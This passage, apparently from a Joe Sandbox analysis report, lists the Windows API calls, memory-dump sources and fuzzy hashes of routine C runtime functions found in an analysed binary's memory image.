                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                • Opcode ID: 4b5be69ff0b3e373e4b68c35f79950b107c921f51e07b63bd0e6d15e764e9b8a
                                                                                                                                                                                                                                                                • Instruction ID: ff26c1c1485af013368e001f5bc4d6890e98318e58dc556e4815fb2025fb6a12
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b5be69ff0b3e373e4b68c35f79950b107c921f51e07b63bd0e6d15e764e9b8a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AD16B75E04648DFCB16CFA8D8809ADBBF9FF49310F24452AE456EB352D730A946CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                • Opcode ID: 0cc05b05e44073f234892ba2de31e5f7d0fda9845f41aac7e7875cc3a945623c
                                                                                                                                                                                                                                                                • Instruction ID: 73d27788cc7b1538f42214c9b23418ce1bd0bdafee5620fa0bd44376dcdd11d5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cc05b05e44073f234892ba2de31e5f7d0fda9845f41aac7e7875cc3a945623c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86510472A04606AFDB2B9F14E8C1B7AB7B4FF01311F15412DE8429B6A1E731ED80CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0034359B
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 003435A2
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 003435DC
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 003435E3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                • Opcode ID: 82b7aec3c82a4419c36cbb69558017271dee84ca6fb82889816c02f2922bca46
                                                                                                                                                                                                                                                                • Instruction ID: 6a25f544a8b9b1920370be5020e40ff272eafe5c8c813a8f76c5a6d121860de0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b7aec3c82a4419c36cbb69558017271dee84ca6fb82889816c02f2922bca46
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A21A471600605AFDB23AF66988182ABBECFF01364B118559F8659F651DB30FF508B91
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b0bc5bb96e1696a756c57f365d3bef71fb55f788b86603f234616493c0c017e6
                                                                                                                                                                                                                                                                • Instruction ID: d31d615f1226ce521cfc43d5649b81497c4eff1d6395b28d64e41bff67f054ff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0bc5bb96e1696a756c57f365d3bef71fb55f788b86603f234616493c0c017e6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC21DCB1604705BFDB27AF618CC092AB7ACAF00364F118628F8699B651EF30EC0087A1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00344857
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2
                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0034488F
                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003448AF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                                                                                                                • Opcode ID: 6ecd8a2bdc729e17d0cdbc6dfeb45154bf633c6eadb4870ee11a4105681f2507
                                                                                                                                                                                                                                                                • Instruction ID: 2e50263731bb21d20e5fe0fa46e9942daa594fde1c7e61aca3e97969d86c41e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ecd8a2bdc729e17d0cdbc6dfeb45154bf633c6eadb4870ee11a4105681f2507
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 981126F65026657FA71327B69CCEEBF29ACDE853D5B200434F401D9141FB65EE0192B1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000), ref: 0034A4F7
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?,?,?,00345365,00000000), ref: 0034A503
                                                                                                                                                                                                                                                                  • Part of subcall function 0034A554: CloseHandle.KERNEL32(FFFFFFFE,0034A513,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?,?), ref: 0034A564
                                                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 0034A513
                                                                                                                                                                                                                                                                  • Part of subcall function 0034A535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0034A4D1,00349AFC,?,?,00345A1F,?,00000000,00000000,?), ref: 0034A548
                                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?), ref: 0034A528
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                • Opcode ID: 0e6bf7ff794dd99a039000b700b24ef6fde8d777093f90fce66060c619b5ce20
                                                                                                                                                                                                                                                                • Instruction ID: 850bfd324bc36171fc1b49dcc2a228f530fc84bd8c28ae0f736ecb2d530f0839
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e6bf7ff794dd99a039000b700b24ef6fde8d777093f90fce66060c619b5ce20
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CF03036050715BFCF231F95EC0999E3F6AFF893A2F014550FA498E130D63299209B92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 003359B9
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 003359C8
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 003359D1
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 003359DE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                • Opcode ID: 78749b24a949dfd4949240d1e60ba3c287da9ea0bbdcc9fa4d1d55dde0fc50a2
                                                                                                                                                                                                                                                                • Instruction ID: 7b426bf5a424b9a96f28fbde2b07c0eec278c19cad0528da278e384c862c67df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78749b24a949dfd4949240d1e60ba3c287da9ea0bbdcc9fa4d1d55dde0fc50a2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37F0AF70D1120CEBCB01DBB4C94999EFBF8FF1C301B914996A412E7120E730AB448F50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00339266,?,?,?,00000055,?,-00000050,?,?,?), ref: 003421D6
                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00339266,?,?,?,00000055,?,-00000050,?,?), ref: 0034220D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                • String ID: utf8
                                                                                                                                                                                                                                                                • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                • Opcode ID: adfb9526e472870a16e4e9f26ffbe9ce94682e5812a1a432f8e7c4eeefaf6d1d
                                                                                                                                                                                                                                                                • Instruction ID: 59f9495555860252f8a5d90802b8655cacd655d99ea89ac804bf5ff454a55345
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adfb9526e472870a16e4e9f26ffbe9ce94682e5812a1a432f8e7c4eeefaf6d1d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A51E675640305AADB27AB748C82BAB73E8EF44740F960429FA45FF181FBB4F9408661
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0033DEAD,?,?,00000000,00000000,00000000,?), ref: 0033DFD1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                • Opcode ID: a5e654b550f58591b4924db8d918cbe1ed9a9f71b8592fdada19ea51434f6dda
                                                                                                                                                                                                                                                                • Instruction ID: 6832b44ba00bb5470a1a0579ed5b7a189e2c35d06e17bdeb6d710891df54f431
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5e654b550f58591b4924db8d918cbe1ed9a9f71b8592fdada19ea51434f6dda
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB416A75900209AFCF2ADF99DCC1AEEBBB5FF48304F198059FA04AB2A1D3759950DB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E4F7: HeapFree.KERNEL32(00000000,00000000,?,00341A55,?,00000000,?,?,003416F5,?,00000007,?,?,0034203B,?,?), ref: 0033E50D
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E4F7: GetLastError.KERNEL32(?,?,00341A55,?,00000000,?,?,003416F5,?,00000007,?,?,0034203B,?,?), ref: 0033E518
                                                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 00341EBF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                • String ID: 8Z5$TY5
                                                                                                                                                                                                                                                                • API String ID: 4068849827-3139154967
                                                                                                                                                                                                                                                                • Opcode ID: e24d61745a870e77fe1a009d48e54452870693cdf4f975e47738d1bac3dcb157
                                                                                                                                                                                                                                                                • Instruction ID: 3a1a9fcf2d6d46d66265a616a92b56bbb6ae7111d3ecd9f767456990f2d8aab8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e24d61745a870e77fe1a009d48e54452870693cdf4f975e47738d1bac3dcb157
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E316D32600A019FDB23AA79D949B6677E8EF04750F114A19E855DF191DF74FCC5CB10
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0033DA8F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                                • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                • Opcode ID: 60cbdaf46866b34a5648e6910b6117ebfedd7c724d1b24a7b10f7fe76cde6095
                                                                                                                                                                                                                                                                • Instruction ID: 38b9783ec555db0397c5be45d1619ac59bbb7b2c94dfcf46af2d65e70c71819e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60cbdaf46866b34a5648e6910b6117ebfedd7c724d1b24a7b10f7fe76cde6095
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2931D336904358EBCF239F50ECC09AABB65FF08366F1A415AF8544A221C332DDA1DB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00334B74
                                                                                                                                                                                                                                                                • ___raise_securityfailure.LIBCMT ref: 00334C5C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                • String ID: xf5
                                                                                                                                                                                                                                                                • API String ID: 3761405300-3233278200
                                                                                                                                                                                                                                                                • Opcode ID: cf47784ec2f67307acba9d93d6b2f164b10ffdc1b2d9e183f1291bf0f3f2ec01
                                                                                                                                                                                                                                                                • Instruction ID: ae0045f139252531c4e8317b9b3654f9b0213b535595028786e2403dd990333f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf47784ec2f67307acba9d93d6b2f164b10ffdc1b2d9e183f1291bf0f3f2ec01
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F121BCB45013009BE742CF25E996A447BF8FB4C71AF90A12AE5098B2B0E3B1A981CF44
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00334A97
                                                                                                                                                                                                                                                                • ___raise_securityfailure.LIBCMT ref: 00334B54
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                • String ID: xf5
                                                                                                                                                                                                                                                                • API String ID: 3761405300-3233278200
